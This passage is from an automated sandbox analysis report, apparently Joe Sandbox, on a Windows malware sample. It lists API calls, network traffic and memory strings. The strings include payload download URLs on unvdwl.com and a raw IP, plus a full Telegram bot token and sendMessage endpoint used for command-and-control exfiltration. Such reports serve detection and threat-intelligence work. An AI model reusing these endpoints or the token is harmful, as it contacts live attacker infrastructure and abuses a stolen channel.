Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A934985F memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,memcmp,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,memcmp,memcmp,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free, 28_2_00007FF8A934985F
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933B870 CRYPTO_free, 28_2_00007FF8A933B870
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D7870 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free, 28_2_00007FF8A92D7870
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D9850 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_decapsulate,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free, 28_2_00007FF8A92D9850
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E5840 i2d_PUBKEY,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,d2i_PUBKEY,EVP_PKEY_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free, 28_2_00007FF8A92E5840
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F3840 OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92F3840
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93438C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug, 28_2_00007FF8A93438C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933B8C0 CRYPTO_free, 28_2_00007FF8A933B8C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A930B8D0 CRYPTO_free,CRYPTO_free,OSSL_ERR_STATE_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A930B8D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93318D0 CRYPTO_free, 28_2_00007FF8A93318D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93218E9 CRYPTO_malloc,CRYPTO_free, 28_2_00007FF8A93218E9
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93078D0 BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A93078D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9345760 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A9345760
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E3700 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92E3700
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D1740 CRYPTO_zalloc,CRYPTO_free, 28_2_00007FF8A92D1740
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E5780 a2i_IPADDRESS,ASN1_OCTET_STRING_free,X509_VERIFY_PARAM_get1_ip_asc,CRYPTO_free,X509_VERIFY_PARAM_add1_host, 28_2_00007FF8A92E5780
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83C04A6 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,_wcsdup,CertOpenStore,GetLastError,free,free,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,calloc,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,malloc,fclose,free,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,free, 28_2_00007FF8B83C04A6
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B8372B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 28_2_00007FF8B8372B80
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83C2CC0 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 28_2_00007FF8B83C2CC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83BFF30 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 28_2_00007FF8B83BFF30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83C31F0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx, 28_2_00007FF8B83C31F0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B8372B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 34_2_00007FF8B8372B80
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83C2CC0 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 34_2_00007FF8B83C2CC0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83BFF30 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 34_2_00007FF8B83BFF30
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83C31F0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx, 34_2_00007FF8B83C31F0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83A74E0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext, 34_2_00007FF8B83A74E0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83C04A6 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,CertOpenStore,GetLastError,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,fclose,MultiByteToWideChar,PFXImportCertStore,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free, 34_2_00007FF8B83C04A6
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83A7560 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 34_2_00007FF8B83A7560
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83A75F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 34_2_00007FF8B83A75F0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83916F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 34_2_00007FF8B83916F0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B8391820 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext, 34_2_00007FF8B8391820
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83918A0 CryptHashData, 34_2_00007FF8B83918A0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83C28A0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,free,CertFreeCertificateContext, 34_2_00007FF8B83C28A0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83918B0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 34_2_00007FF8B83918B0
Source: svchost.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Contains functionality to create an SMB header
Source: C:\Windows\System32\svchost.exe Code function: mov dword ptr [rbp+04h], 424D53FFh 28_2_00007FF8B83A8DE0
Source: C:\Windows\System32\console_zero.exe Code function: mov dword ptr [rbp+04h], 424D53FFh 34_2_00007FF8B83A8DE0
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49965 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49985 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:49994 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:49997 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:50005 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:50008 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:50011 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:50014 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:50017 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:50024 version: TLS 1.2
Source: app64.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: svchost.exe, 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 00000022.00000002.2596284562.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623137940.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: vcruntime140d.amd64.pdb source: vcruntime140d.dll.13.dr
Source: Binary string: vcruntime140d.amd64.pdb,,, source: vcruntime140d.dll.13.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: svchost.exe, 0000001C.00000002.3270413285.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 00000022.00000002.2597062876.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002C.00000002.2623385168.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 0000001C.00000002.3269556745.00007FF8A7DCB000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: svchost.exe, 0000001C.00000002.3270312205.00007FF8B8B18000.00000002.00000001.01000000.0000000D.sdmp, libpq.dll.13.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: svchost.exe, 0000001C.00000002.3270312205.00007FF8B8B18000.00000002.00000001.01000000.0000000D.sdmp, libpq.dll.13.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: svchost.exe, 0000001C.00000002.3270413285.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 00000022.00000002.2597062876.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002C.00000002.2623385168.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: svchost.exe, 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmp, libssl-3-x64.dll.13.dr
Source: Binary string: ucrtbased.pdb source: ucrtbased.dll.13.dr
Source: Binary string: PrintUI.pdb source: xcopy.exe, 00000008.00000002.2186107127.000001C43773B000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000A.00000002.2213277015.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000002.2687703393.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000000.2216782494.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe.8.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: svchost.exe, 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmp, libssl-3-x64.dll.13.dr
Source: Binary string: PrintUI.pdbGCTL source: xcopy.exe, 00000008.00000002.2186107127.000001C43773B000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000A.00000002.2213277015.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000002.2687703393.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000000.2216782494.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe.8.dr
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74713C568 FindClose,FindFirstFileExW,GetLastError, 34_2_00007FF74713C568
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74713C5DC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle, 34_2_00007FF74713C5DC
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\app64.exe Code function: 4x nop then push rbx 0_2_00007FF7DF1146C6

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49946 -> 188.116.21.204:5432
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioAccept: */*
Source: global traffic HTTP traffic detected: GET /resolve?name=unvdwl.com HTTP/1.1Host: dns.googleAccept: */*
Source: global traffic HTTP traffic detected: GET /resolve?name=rootunvdwl.com HTTP/1.1Host: dns.googleAccept: */*
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View IP Address: 140.82.121.4 140.82.121.4
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: ipinfo.io
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: api.telegram.orgContent-Length: 94Expect: 100-continueConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9311C20 BIO_ADDR_clear,BIO_ADDR_clear,ERR_set_mark,BIO_recvmmsg,ERR_peek_last_error,BIO_err_is_non_fatal,ERR_pop_to_mark,ERR_clear_last_mark,ERR_clear_last_mark, 28_2_00007FF8A9311C20
Source: global traffic HTTP traffic detected: GET /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioAccept: */*
Source: global traffic HTTP traffic detected: GET /resolve?name=unvdwl.com HTTP/1.1Host: dns.googleAccept: */*
Source: global traffic HTTP traffic detected: GET /resolve?name=rootunvdwl.com HTTP/1.1Host: dns.googleAccept: */*
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: rootunvbot.com
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: unvdwl.com
Source: global traffic DNS traffic detected: DNS query: dns.google
Source: global traffic DNS traffic detected: DNS query: rootunvdwl.com
Source: unknown HTTP traffic detected: POST /bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: api.telegram.orgContent-Length: 94Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Wed, 30 Oct 2024 10:29:54 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: no-referrer-when-downgrade
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 96CF:2880F0:110F41E:128DF92:67220ADDAccept-Ranges: bytesDate: Wed, 30 Oct 2024 10:30:57 GMTVia: 1.1 varnishX-Served-By: cache-dfw-kdal2120109-DFWX-Cache: MISSX-Cache-Hits: 0X-Timer: S1730284257.426488,VS0,VE85Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: 5f8a816a393c558f9f4badd0a02981015de93158Expires: Wed, 30 Oct 2024 10:35:57 GMTSource-Age: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.0 (Ubuntu)Date: Wed, 30 Oct 2024 10:30:08 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.0 (Ubuntu)Date: Wed, 30 Oct 2024 10:30:14 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.0 (Ubuntu)Date: Wed, 30 Oct 2024 10:30:27 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-alive
Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://194.26.192.52/un2/urestorehard.dat
Source: powershell.exe, 00000028.00000002.2570675567.0000018003DB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: powershell.exe, 00000028.00000002.2570252643.0000018001535000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoftk
Source: powershell.exe, 00000003.00000002.2218673511.000002712643C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://github.com
Source: svchost.exe, 0000001C.00000002.3267456047.0000000064953000.00000008.00000001.01000000.00000012.sdmp String found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: powershell.exe, 00000003.00000002.2248920872.0000027134EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2218673511.0000027126477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000010.00000002.2251089599.000001F4CA22B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2251089599.000001F4C9078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.2218673511.0000027124D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2251089599.000001F4C8E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.00000180033D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.2251089599.000001F4CA22B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2251089599.000001F4C9078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.2218673511.000002712635C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unvdwl.com/un2/botprnt.dat
Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://unvdwl.com/un2/urestorehard.dat
Source: powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmp String found in binary or memory: http://www.gnu.org/licenses/
Source: svchost.exe String found in binary or memory: http://www.zlib.net/
Source: svchost.exe, 0000001C.00000002.3270431776.00007FF8BA257000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 00000022.00000002.2597133834.00007FF8BA257000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002C.00000002.2623418463.00007FF8BA257000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: http://www.zlib.net/D
Source: powershell.exe, 00000003.00000002.2218673511.0000027124D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2251089599.000001F4C8E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.00000180033AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.0000018003377000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000028.00000002.2570675567.0000018003E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.tele
Source: powershell.exe, 00000028.00000002.2570675567.000001800372A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegra
Source: powershell.exe, 00000028.00000002.2570675567.0000018003664000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram
Source: powershell.exe, 00000028.00000002.2570675567.000001800372A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.
Source: powershell.exe, 00000028.00000002.2570675567.000001800372A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.o
Source: powershell.exe, 00000028.00000002.2570675567.000001800372A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.0000018003664000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.or
Source: powershell.exe, 00000028.00000002.2570675567.0000018003861000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: powershell.exe, 00000028.00000002.2620974839.000001801B64F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/
Source: powershell.exe, 00000028.00000002.2570675567.0000018003664000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/b
Source: powershell.exe, 00000028.00000002.2570675567.00000180037FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7985
Source: printui.exe, 0000000D.00000002.2687540971.0000020E692D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessJO
Source: powershell.exe, 00000028.00000002.2570454684.0000018002E30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage
Source: powershell.exe, 00000028.00000002.2567151922.00000180012EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage.dll
Source: powershell.exe, 00000028.00000002.2567151922.00000180012EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessagea$
Source: powershell.exe, 00000028.00000002.2620911550.000001801B540000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7985593430:aaef1nr-tpqit5epqkopg8e701bartuiav0/sendmessage
Source: powershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: svchost.exe, console_zero.exe String found in binary or memory: https://curl.se/
Source: svchost.exe, 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 00000022.00000002.2596558102.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623260708.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/V
